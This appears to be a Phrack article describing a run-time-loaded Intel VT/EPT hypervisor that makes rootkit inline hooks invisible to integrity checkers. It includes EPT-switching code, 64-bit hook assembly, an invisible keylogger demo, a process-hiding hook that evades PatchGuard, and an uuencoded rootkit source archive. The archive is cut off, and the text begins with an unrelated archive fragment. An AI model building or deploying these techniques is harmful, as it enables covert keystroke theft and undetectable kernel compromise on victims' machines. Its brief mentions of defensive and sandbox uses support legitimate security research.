MPB<8ZXM^R`+"!;2?:D`M^8T)ZR7>!+Z9],8P12C@3'^&NZUVG]S/^)ZLL319
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
+\_\!1G2PPP#@`0``
`
end

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0f of 0x10

|=-----------------------------------------------------------------------=|
|=----------------------=[ How to hide a hook  ]=------------------------=|
|=-------------------=[ A hypervisor for rootkits ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=------------------=[ uty <whensungoes@gmail.com> ]=--------------------=|
|=----------------=[ saman <saman.zonouz@rutgers.edu> ]=-----------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

1. Introduction
2. Background
    2.1 Intel VMX
    2.2 EPT
3. How to make a hook invisible
    3.1 Hypervisor setup
    3.2 Memory 1:1 mapping
    3.3 Two mappings for one page
    3.4 User mode pages
    3.5 Execute and read at the same page
    3.6 Wakeup from sleep
4. Demo
    4.1 A keylogger
    4.2 Bypass PatchGuard
5. Other Applications
6. Greetings
7. References
8. Appendix: Code


--[ 1. Introduction

Writing rootkits is becoming more and more difficult. Because there are
many tools waiting out there to detect misbehaviors. Adversaries put so
much effort trying to make rootkits as stealthy as possible but there needs
to be only one hook that defense solutions could monitor and detect the
misbehavior.

Our goal is to make that hook invisible so that the detection tools cannot
see it even using dynamic debuggers to check that range of code, while to
rootkit does exist and functions correctly. There are other approaches,
like Shadow workers which are based on TLB splitting. Researchers would
initially wonder when the corresponding Intel cpu architecture was going to
change, and it recently did [6][7][8]. Also TLB splitting need to hook page
fault handler, that is a pain in practice. We present a way to do it only
by virtualization technology, typically use Intel VT with EPT (Extended
Page Tables) [5]. The same principle could also apply to other CPUs like
ARM, as long as they support hardware virtualization, physical memory
translation and can distinguish different types of access to a page. For
instance, in x86 paging mode, a read operation is not denied as long as the
page is marked as executable.

We provide a 64bits run-time loaded hypervisor, it is loaded as a Windows
driver. And with EPT, underneath the guest operating system our solution
maps all the physical memory, using a 1:1 mapping. We leverage it to map a
guest physical page to two different host physical pages. One is set with
READ and WRITE and the other one with EXECUTE only. Normally it will be set
as EXECUTE, which CPU can run on that page, but when someone want to check
the integrity of it, for example to see if there is any hooks. The READ
operation by the checker will trigger an EPT violation, the hypervisor will
get noticed and change the underlying mapping of that page to another host
physical page that contains whatever stuff you want the checker to see,
e.g., the original code without any of your inline hooks. On the other end,
when the CPU tries to execute code on this page again, it also will cause a
EPT violation, we just change it back and let the CPU continue on it.

It is noteworthy that there are many kinds of hooks. In this paper, we
focus on the inline hook for the modifications on the code section. Other
types like SSDT hook or kernel object manipulation are outside the scope of
this article.

The platform we are woking on are Windows 7 x64 and Windows 8.1 x64. Sure,
with the invisible inline hooks, you can ignore Windows PatchGuard!


--[ 2. Background

--[ 2.1 Intel VMX

VMX is short for Intel virtual-machine extensions, it supports
virtualization of CPUs in hardware. VMX supports two more lower operation
mode called root and non-root mode. Usually processor has running
mode known as ring-0 to ring-3, where ring-0 is kernel mode, ring-3 is user
mode, ring 1 and ring 2 are rarely used. When CPU enables virtualization,
it could be seen as running in the non-root mode. The root mode can be
considered as a lower and more privileged level, it controls the whole CPU.
And the guest operating system will run in non-root mode. Root mode runs
VMM (Virtual Machine Monitor) is often called ring -1.

VMXON and VMXOFF are instructions to enter and exit VMX mode. There is an
important data structure called VMCS (Virtual-Machine Control Structure),
which is 4 KB large in size. It controls the state switch between VMX root
mode and VMX non-root mode. From root mode to non-root mode called VM Exit.
From non-root mode to root mode called VM Enter.

Every logical CPU (each core in a real physical CPU is called a logical
CPU) has a processor state called VMCS pointer. It contains the physical
address of the VMCS. There could be many VMCSs, the one stored in VMCS
pointer is considered as the current one. Every VMCS can represent a
virtual processor for the virtual machine, inside virtual machine, that is
a logical CPU seen by operating system. Although hypervisor knows the
physical address of a VMCS, but hypervisor cannot modify it directly,
hypervisor can only reads and writes VMCS using VMREAD, VMWRITE
instructions. Hypervisor use VMPTRLD to set a VMCS both as active and
current. And use VMCLEAR to mark the VMCS as inactive.

A VMCS contains many fields related every aspect of a virtual machine.
There are six fields: Guest-state area, Host-state area, VM-execution
control fields, VM-exit control fields, VM-entry control fields and VM-exit
information fields. And each field also contains many more control fields
with a lot of settings. Once the CPU enters into a virtual machine by
execute VMLAUNCH which associates with a VMCS, this virtual machine is
fully control by the settings in the VMCS. Hypervisor can set during what
circumstances the virtual machine should exit. And then the hypervisor can
handle this situation, for example emulate a hardware device or change the
virtual machine's behavior.

In our case, we do not actually emulate any hardware device, we put the
current system into a virtual machine environment and our code run as the
hypervisor.


--[ 2.2 EPT

The extended page-table mechanism (EPT) is used to support physical memory
virtualization. When inside a virtual machine, a virtual memory access will
be translated into a physical memory access by virtual CPU. Since the
virtual machine is emulated, the physical memory inside the virtual machine
is also emulated. It is called guest physical memory, which cannot be
accessed directly by CPU. In earlier days, hypervisors had to maintain a
guest virtual memory to host physical memory mapping called "shadow page
table". It is hidden from guest operating system. Hypervisor needed to make
sure the guest operating system believes that there is no such thing. So
every operation by the guest operating system had to be intercepted and
handled by hypervisor to provide a `fake` result to look normal to the
guest operating system. This was tedious dynamically.

With EPT enabled virtual machine, hypervisor's responsibilities drop. The
guest CPU translates and accesses physical memory as it wishes. But the
guest physical memory is interpreted again by the hypervisor to translate
it to the real host physical memory.

From the name, EPT is a page table. It is quite similar to the page tables
in x86 architecture. Every guest physical address to host physical address
translation is performed by EPT. In comparison to x86 paging mechanism,
every VMCS has a EPT pointer, that is like CR3 in x86. It stores the root
of the table. And it uses 4 level page-walk, there are PML4E, PDPTE, PDE
and PTE. Page fault in EPT's term is called EPT violation, that could be
CPU accessing the guest physical memory which is not currently mapped or
there is an access permission violation.


--[ 3. How to make a hook invisible

--[ 3.1 Hypervisor setup

First we need to setup a hypervisor once Windows operating system
boots up. It could be cumbersome just to fill VMXON region and VMCS that
are the most important data structures in VMX. There have been open-source
projects that have accomplished similar goals, e.g., Xen[2], HyperDbg[3],
BluePill[4] and Intel. I learn from the giants. Code is available at
EnalbeVMX() and VmxSetupVMCS() which both are called by doStartVMX().
doStartVMX() need to be called from every CPU core of the system. This is
because we need to put every physical cpu core into VMX mode (interested
reader is referred to Intel manual "31.5 VMM SETUP & TEAR DOWN”[5]).

Once VMCS is set up properly and executes vmxlauch successfully, the
hypervisor starts running. We then get many vm exits that we need to
handle. The handling function is doVmxExitHandler() that is located in
vmxexithandler.c. Some vm-exits happen even without any particular
settings in VMCS; for example, the control register operations.


--[ 3.2 Memory 1:1 mapping

Our hypervisor is loaded at run-time. The operating system and device
drivers already has been initialized. So the physical pages and especially
interface registers in devices which mapped to physical memory space
through MMIO (Memory mapped IO) are decided. At this point we can choose
mapping of the guest physical address space to host physical address space
directly using EPT. It's a 1:1 mapping. In other words, for example there
is physical address access at guest physical address 0x1C000, the
underneath hypervisor will direct translate it to host physical address
0x1c000.

  +-----------------------------+
  | #   # #        #  #         |         Guest Virtual Pages
  +--\-/---\--------\-|---------+
      X     \        \|
  +--/-\-----\--------|\--------+
  | #   #     #       # #       |         Guest Physical Pages
  +-|---|-----|-------|-|-------+
    |   |     |       | |                                   (Guest machine)
----|---|-----|-------|-|--------------------------------------------------
  +-|---|-----|-------|-|-------+                            (Hypervisor)
  | #   #     #       # #       |         Host Physical Memory
  +-----------------------------+

EPT tables entries also need to specify memory type. Because in physical
memory space, there are RAM, ROM, graphics memory and device registers,
they all exist in physical memory space. Memory types could be any of the
following:

  Uncacheable
  Write Through
  Write Combine
  Write Protected
  Write Back

The details of cache police (11.3 METHODS OF CACHING AVAILABLE [5]) is not
covered here.

Different kinds of memory should have different memory type. For example,
memory ranges of PCI devices should use "Uncacheable". RAM normally should
be "Write Back" and graphics memory could be "Write Combine" for better
performance. As I test it, you could just make all the physical memory
space as "Uncacheable", but it will be extremely slow because by doing that
you give up cache. On the other hand, you should not mark all the memory
types as "Write Back", because PCI devices ranges usually contains
registers on the devices, it is important for the register to get data
strictly in order.

To decide on the memory type, we could first check Memory Type Range
Registers (MTRR) and also check Page Attribute Table (PAT) which is
specified in page table entries. MTRR and PAT are both Intel CPU's
mechanisms to assign memory types to physical memory. MTRR are a set of MSR
registers to specify memory type for several ranges of memory, usually
eight ranges. PAT is supplementary to MTRR that it can provide page
granularity control.

For this prototype project, we just set "IgnorePAT" bit in EPT entries and
set whole RAM as "Write back" and all other memory as "Uncacheable".
Because from Intel manual it seems EPT entries only support this two memory
types. "A value of 0 indicates the Uncacheable type (UC), while a value of
6 indicates the write-back type (WB). Other values are reserved" [5].

So how do we know which range of memory is RAM? There is a data structure
called E820 table. It got its name because there is a BIOS function, int
0x15. With argument 0xE820 in eax register, raising interruption 0x15 will
get the memory map for your PC. But since this is a BIOS function and the
system already boot up, we cannot call it anymore. Fortunately on Windows
operating system, all the memory information is stored in registry. It is
"HKEY_LOCAL_MACHINE\HARDWARE\RESOURCEMAP\System Resources". We will not go
into details about the stored data structure [9], but that is how we get
the memory layout information in our implementations. This information is
available at GetE820FromRegistry().


--[ 3.3 Two mappings for one page

Suppose we want to hook function NtCreateFile for example, before doing
anything we should first find the physical page where the function is
within. Next we prepare another physical page which is totally copied from
the original one. This copy is to provide to the checker to evade any
integrity violation detection. In the following we will call these two
pages as the original page and the shadow page. The original page is the
one we will later install hooks on.

Now we are ready to install inline hook on the original page. After that,
we let the original page have the EXECUTE permission flag and the shadow
page has READ & WRITE bits, and we tell hypervisor all about it.

So the NtCreateFile with our inline hook will run normally as it has
EXECUTE bit. Let's assume there is someone trying to take a look at the
function. The read operation will violate the permission the page has. So
there will be an EPT violation raised to the hypervisor. Since we have the
control over the hypervisor, we change the page's mapping to the shadow one
with READ & WRITE bits. With the correct permission flags, the virtual
machine is happy to run again. Remember the content of the shadow page is
untouched by us hence no inline hook in it. Later the kernel will call
NtCreateFile and there will be another EPT violation, we change its mapping
back and everything is back to the original state. This ensures that the
integrity check is satisfied and our modification evades the detection.

In our implementation, we do not change EPT table entries all the time,
actually we have two identical but slightly different EPT tables. And the
original page and the shadow page are recorded separately in these two
tables. When EPT violation happens, we just simply switch between them.

The EPT related functions are implemented in ept.c. In HandleEptViolation()
handles the EPT violations:

if (PAGE_ALIGN(ul64GuestPhysicalAddress)
	== PAGE_ALIGN(g_TmpShadowHookAddress))
{
	if (pCurrentVMMInitState->ShadowEpt)
	{
		SwitchToEPTOriginal(pCurrentVMMInitState);
	}
	else
	{
		SwitchToEPTShadow(pCurrentVMMInitState);
	}

	return;
}

EptViolation((BOOLEAN)(eqe & EPT_VIOLATION_EXIT_QUAL_WRITE_BIT),
		ul64GuestPhysicalAddress);

So when ept violation happens, our solution first checks if faulting guest
physical page equals the page where it installed the hook on. If so, the
engine knows it is due to the access violation, and we just switch its
mapping by using the other EPT table. If not, it is an IO page that needs a
1:1 mapping.

As it can be inferred, we can only install hook on one page. However, one
can slightly extend it to handle multiple pages using Exit Qualification to
determine the cause of the EPT violation (see Intel manual "28.2.2  EPT
Translation Mechanism" [5]). The code that accomplishes that goal would be:

#define EPT_VIOLATION_EXIT_QUAL_READACCESS		0x1
#define EPT_VIOLATION_EXIT_QUAL_WRITEACCESS		0x2
#define EPT_VIOLATION_EXIT_QUAL_EXECUTEACCESS	0x4

#define EPT_VIOLATION_EXIT_QUAL_READABLE		0x8
#define EPT_VIOLATION_EXIT_QUAL_WRITABLE		0x10
#define EPT_VIOLATION_EXIT_QUAL_EXECUTABLE		0x20

if (eqe & (EPT_VIOLATION_EXIT_QUAL_READABLE |
           EPT_VIOLATION_EXIT_QUAL_WRITABLE |
	    EPT_VIOLATION_EXIT_QUAL_EXECUTABLE))
{
	if ((eqe & EPT_VIOLATION_EXIT_QUAL_READACCESS) ||
		(eqe & EPT_VIOLATION_EXIT_QUAL_WRITEACCESS))
	{
		// Due to read or write access violation
	}
	else if (eqe & EPT_VIOLATION_EXIT_QUAL_EXECUTEACCESS)
	{
		// Due to execute access violation
	}
}
else
{
	// No any access violation, do a 1:1 mapping
}



--[ 3.4 User mode pages

For user mode pages, because EPT is in charge of the physical page address
translation underneath. Once you make sure which physical page is backing
up the user mode page, the rest is almost the same as in kernel mode. But
user mode pages often be swapped out to disk. When it swaps back to memory,
it may ends up in a different physical page frame.

So we have to lock the page from being swapped out. It is important for
both kernel pages and user pages. How do we lock it? First thing to try
is MmProbeAndLockPages(), but you have to release the lock before a process
context switch. If you don't, what will happen is Windows mm will know and
give you a Bug Check 0x76: PROCESS_HAS_LOCKED_PAGES.

Since we already get into hypervisor, it is a little embarrassing to go
back and find out what is going on with mm. Luckily, there is a win 32 API
called VirtualLock(). From its name, we can tell it must be the one.
Although this may leave a clue that something is going on with this page
but it is just a common Win32 API, I guess many existing software modules
make use of it.


--[ 3.5 Execute and read at the same page

There could be one situation that one instruction may be executed and read
data at the same page. For example, the IAT jump table. That need READ and
EXECUTE permission at the same time.

One way to solve this problem is to give it all permissions for short
period of time, let this special instruction do whatever it wants and then
set it back. We set the READ and EXECUTE permissions and also set single
step flag for the guest virtual machine. So it will execute and stop at the
next instruction. We then handle this event and change the permissions
back and clear the single step flag. Sounds like a plan, but in reality
there will be some problems, virtual machine behaves strange with multiple
CPUs. I am still trying to figure it out. This truly could be a problem,
for which the solution would be emulating that instruction by hypervisor.


--[ 3.6 Wakeup from sleep

When CPU wakeup from S4 state(sleep), the CPU state is restored. But not
the VMX states. It means when wakeup from sleep, the CPU is not in VMX mode
anymore. We should reinitialize VMX when the system wakes up [1]. The code
is located in powercallback.c.


--[ 4 Demo

--[ 4.1 A keylogger

This is a simple keylogger that will leave no hook to be found. There are
many places you can hook for a keylogger. The one we choose is
KeyboardClassServiceCallBack. It is a low level function but not too low,
both PS/2 and USE keyboard will call it to transfer keystrokes. And this
part is not mine, I cannot find the right author to say thank you :)

Inline hooking in 64bits environment usually takes 14 bytes rather than
5 bytes in 32bits. It first pushes quad word address into stack, following
by a RET instruction:

PUSH <Low Absolute Address DWORD>
MOV [RSP+4], DWORD <High Absolute Address DWORD>
RET


So the original KeyboardClassServiceCallBack() looks like:

fffff880`03994990 4c8bdc          mov     r11,rsp
fffff880`03994993 49895b08        mov     qword ptr [r11+8],rbx
fffff880`03994997 49896b10        mov     qword ptr [r11+10h],rbp
fffff880`039949s9b 49897318       mov     qword ptr [r11+18h],rsi
fffff880`0399499f 57              push    rdi
fffff880`039949a0 4154            push    r12
fffff880`039949a2 4155            push    r13
fffff880`039949a4 4156            push    r14

After inline hooking, it then looks like:

fffff880`03994990 68b058d502      push    2D558B0h
fffff880`03994995 c744240480f8ffff mov     dword ptr [rsp+4],0FFFFF880h
fffff880`0399499d c3              ret
fffff880`0399499e 90              nop
fffff880`0399499f 57              push    rdi
fffff880`039949a0 4154            push    r12
fffff880`039949a2 4155            push    r13
fffff880`039949a4 4156            push    r14


The address pushed into stack is the address of the trampoline function
which first execute those missing instructions and then jump right back to
the original KeyboardClassServiceCallback.

With our attack, the malicious driver first make a copy of the page which
KeyboardClassServiceCallback within. As mentioned before, it's for the
checker. Then it will tell hypervisor both of the pages by a vmcall. The
hypervisor will then take care of the rest.

One thing I should mention, the demos has some hard coded values, it works
on my test machines, but you should modify it a little bit to run on other
version of Windows. You know how it is :)


--[ 4.2  Bypass PatchGuard

PatchGuard won't check driver images other than kernel, both the
KeyboardClassServiceCallback hook keylogger and the interruption hook
keylogger can not trigger it. So we have to simply hook a system service
call which PatchGuard do care about. Let's say NtQuerySystemInformation. If
we don't have hypervisor underneath, hooking a system service function will
lead to BSOD with bug check code 0x109 (CRITICAL_STRUCTURE_CORRUPTION). It
usually take several minutes for PatchGuard to find out, sometimes it may
need half an hour.

So in this demo project, we just simply inline hook
NtQuerySystemInformation() and hide a process. In our explorations, we
found out that there is some data within the same page with
NtQuerySystemInformation(). And Windows operating system keeps referencing
them. Hence this page will be switched back and forth between two EPT
tables all the time. On the other hand, NtCreateFile() causes a very
different silent situation. So in project "test" you can test either one of
them by enabling function TestInvisibleNtCreateFileInlineHook() or
TestInvisibleNtQuerySystemInformationInlineHook().

--[ 5  Other applications

This could be used by rootkit, also it could be used by anti-virus products
to hide track from being detected by malware.

To defend and discover 0-day attacks, sandbox system is used more and more
widely. It quite efficient because it does not heavily rely on virus
signatures. When a sample need to be analyzed, it will be put into a
virtual machine. It makes believe that this is a real victim machine and
run the sample. And the monitor program will record all the behaviors that
the sample shows. If any harmful behavior is found, this sample will be
marked as malware or virus.

So the whole sandbox system is based on monitoring. That is to say there
will be a lot of hooks. Perhaps on Win32 API or system calls.

You can imagine the malware and virus do not want to be treated like that,
they try many ways to defeat sandbox system. One way that is used most
commonly is to detect if there exists any hooks in the system. If there is,
they will consider this as a trap and could behave accordingly.


--[ 6. Greetings

I'd like to say thank you to ufphpc and MysteryMop for the advices and
helping me debugging. Thank Phrack Staff for the endless patience and
encouraging.

Special thanks to uay and our two kids :)


--[ 7. References

[1] http://blogs.msdn.com/b/doronh/archive/2006/06/13/630493.aspx
[2] http://www.xenproject.org
[3] https://code.google.com/p/hyperdbg/
[4] http://theinvisiblethings.blogspot.com/2006/06/
	introducing-blue-pill.html
[5] http://www.intel.com/content/www/us/en/processors/
	architectures-software-developer-manuals.html
[6] http://phrack.org/issues/63/8.html
[7] https://pax.grsecurity.net/docs/pageexec.txt
[8] https://www.blackhat.com/docs/us-14/materials/us-14-Torrey-
	MoRE-Shadow-Walker-The-Progression-Of-TLB-Splitting-On-x86.pdf
[9] https://msdn.microsoft.com/en-us/library/aa390339%28v=vs.85%29.aspx
[10] https://msdn.microsoft.com/en-us/library/windows/hardware/
	 ff564575%28v=vs.85%29.aspx


--[ 8. Appendix: Code

begin 664 hypervisor_for_rootkit.tar.gz
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
